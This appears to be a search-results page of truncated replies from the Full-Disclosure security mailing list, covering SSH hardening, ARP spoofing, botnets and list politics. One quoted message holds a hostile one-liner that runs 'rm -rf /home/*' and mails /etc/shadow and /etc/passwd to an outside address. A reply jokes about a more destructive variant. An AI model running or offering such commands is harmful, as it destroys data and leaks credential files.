Hi,
Hi
How do we calculate memory required for a PNG file from the dimensions
of width and height contained in the file?
It seems that attackers make use of width and height to take control of
clients.
just from H+W? you can't - you'd have to know other things such as
depth, alpha layer presence,
Hi,
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehecat /etc/shadow |mail
full-disclosure@lists.grok.org.uk cat /etc/passwd |mail
full-disclosure@lists.grok.org.uk
first off if you want to do damage rm -R dumb ass, the one you posted
only removes files in /home
perhaps it was *designed*
Hi,
While these two events are not related in any way, I am wondering why people
don't create backup off site or don't plan normal failsafes when their site
is as big as Google (we have seen a few popular sites die because of this
mistake)
err, google isn't just one server - they have a whole
Hi,
What makes this unacceptable? Buying a botnet and turning it off. Hurrah
for them! Unstuff your shirts and get on with your lives.
my TV licence money isn't for paying criminals. What the BBC did
breaks several laws, Computer Misuse Act being the major one. It's not
a case of white hat v's
Hi,
I called for John Cartwright to set up a non-technical cyber security
political full-disclosure mailing list some time ago, nothing was
set up.
because he didn't want to - and there's no demand?
What are the solutions for splitting up full-disclosure into technical
and non-technical
Hi,
Hi folks,
while playing around I had an idea for some new kind of mitm which
works quite well here.
do you mean like:
http://tools.ietf.org/html/draft-chown-v6ops-rogue-ra-02
http://www.tml.tkk.fi/~pnr/publications/WiSe2002-Arkko.pdf
yes, we're aware of the issues for some time now.
Hi,
It's off topic for this thread. FD, by its very nature, is designed
I wonder why so much effort is spent discussing a self-signed
web interface for unsubscribing from a mailing list - when
the email headers clearly state how to leave via an email message
and not bother with a web interface
Hi,
But your SSID is very easy to retrieve, as it is leaked every time you
associate a legitimate box to your wlan... And guess what: the regular
I think Anshuman was attempting what's called 'humour' :-)
alan
___
Full-Disclosure - We believe in
Hi,
What % have access *and* are sufficiently criminal-minded to want to take
advantage of the exploit? Remember that *most* people are basically
law-abiding
...unless it's easy or cheap/free to break the non invasive or
damaging 'laws' (eg copyright infringement) - many many people
who tread
Hi,
Please let them know what you think of their policy of non-disclosure
and coverups. I hope someone also educates them on their ridiculous
http://www.kernel.org/pub/linux/kernel/v2.6/
the whole source code for Linux kernel available for _anyone_
to download, scan through, run tools
hi,
James, last time I checked there were several online resources
where such scans can be submitted - and those people that
use those resources are able to take action - eg get alerts
about systems on your own nets etc - whilst an email to this
list is informative, it's not quite the best way,
Hi,
There are actually studies going on RIGHT NOW to see if phones can be
allowed to be used during flights by the FCC/FAA, and in other countries as
well.
several european carriers now allow mobiles to be used in flight. - i'm
bothered more by the person inanely chatting during the flight
Hi,
How can you say the cyber world is unlikely to end when Cisco is the
most widely used router on the internet today? Everyone uses Cisco,
all the ISP's and everyone.
I tend to ignore your comments, however this is just ridiculous.
The internet is based on CISCO? yes. sure. I'm sure that
Hi,
It won't be our necks on the line, it will be heads within government
which will be rolling who decided to ignore us and that this
presentation was a good idea.
eh? have you kept up with UK politics recently. No heads roll
with 'new labour' - no matter what massive messes they make of
Hi,
have pasted and also the advice on keeping the SSH on a different port.
run SSH on a different port? okay, dumb scanners won't find it, but
others will. just don't use password-based SSH and don't let it be wide
open to the whole internet (firewall it to the addresses you need - and
add in a
Hi,
It is a remote root exploit on a very popular piece of hardware, you don't
think that is a big deal?
from what I've read, most people are sticking WinXP or Ubuntu onto these
EEPCs as soon as they get them
alan
hi,
there's a possibility there - but if you're on the same network and
there is no separation protection then there are lots of other
tools and methods that could be used to stick your box as a man-in-middle
if new or unsure you need to look for, eg gratuitous ARP, ARP poisoning,
Cain & Abel... a
Hi,
Oct 22 20:36:13 nms sshd[90657]: Failed password for invalid user gopher
from 77.46.152.2 port 55120 ssh2
user/password authentication for SSH? one way of cleaning up your
logs and killing this type of attack is to reconfigure your OpenSSH
to only allow key based logins. stopped my 10M+
Hi,
The issue lies in that if the user gets the memorable information
incorrect they are asked for the same character positions (e.g. 1,
7 and 9 again). This continues forever, basically making the
memorable information pointless because it will not take much to
brute force it.
not
LOL. you missed out a lot of Written by and entries where Copyright wasn't
written in English...and MODULE calls with author info...but i'm too lazy
to make FIXUPs for such trivial changes! ;-)
alan
Hi,
your email address is interesting, googlemail.com, not gmail.com? are
you from google?
nah, probably from UK - they've forced people to use that new name due
to some legal 'gmail' dispute.
http://mail.google.com/mail/help/intl/en-GB/googlemail.html
alan
Hi,
When you sign up for a n3td3v account, your account will be bound with
your IP address, and you will only be able to access your account with
that IP address unique address. If you try and access your account on
an IP address you didn't sign-up with, you'll be denied access to your
Hi,
future of the list. Please pull away from Secunia and remove the URL,
FFS. why don't you simply configure your email client not to show signatures?
alan
Hi,
is laughable. Why did you subscribe if you aren't prepared to get
messages which you might think should be moderated? It is unmoderated,
that means you may not agree with messages or opinions sent to your
inbox, which means you're the one who needs to shut the fuck up. Did
you think
Hi,
If they are rewording advisories, then they are revealing information
which was not secret. Assuming that they are in fact claiming the
discovery as their own (I haven't checked this myself), I'd consider that
dishonest, but I don't know it would be considered a copyright violation.
hi,
...makes me wonder what happens if/when they need to change the
IP address of go.microsoft.com
many many people have already been burnt by the hardcoding of
addresses/IPs into their applications.
a
Hi,
oh. more of this crap.
let me guess...another open relay. it's like 1994 all over again. could
the owner of 85-31-186-26.blue.kundencontroller.de - aka unixgu.ru
sort out their system? ESMTP Sendmail 8.13.4 isn't too difficult to
manage as a 'guru'
Hi,
to track Nmap release status. And apparently they are doing so :).
The latest (February 6) issue of Newsweek has a picture on page 39 of
George Bush visiting the NSA headquarters in Fort Meade. A wall-sized
ummm, that page is just:
http://securitywizardry.com/radar.htm
it is a
28 matches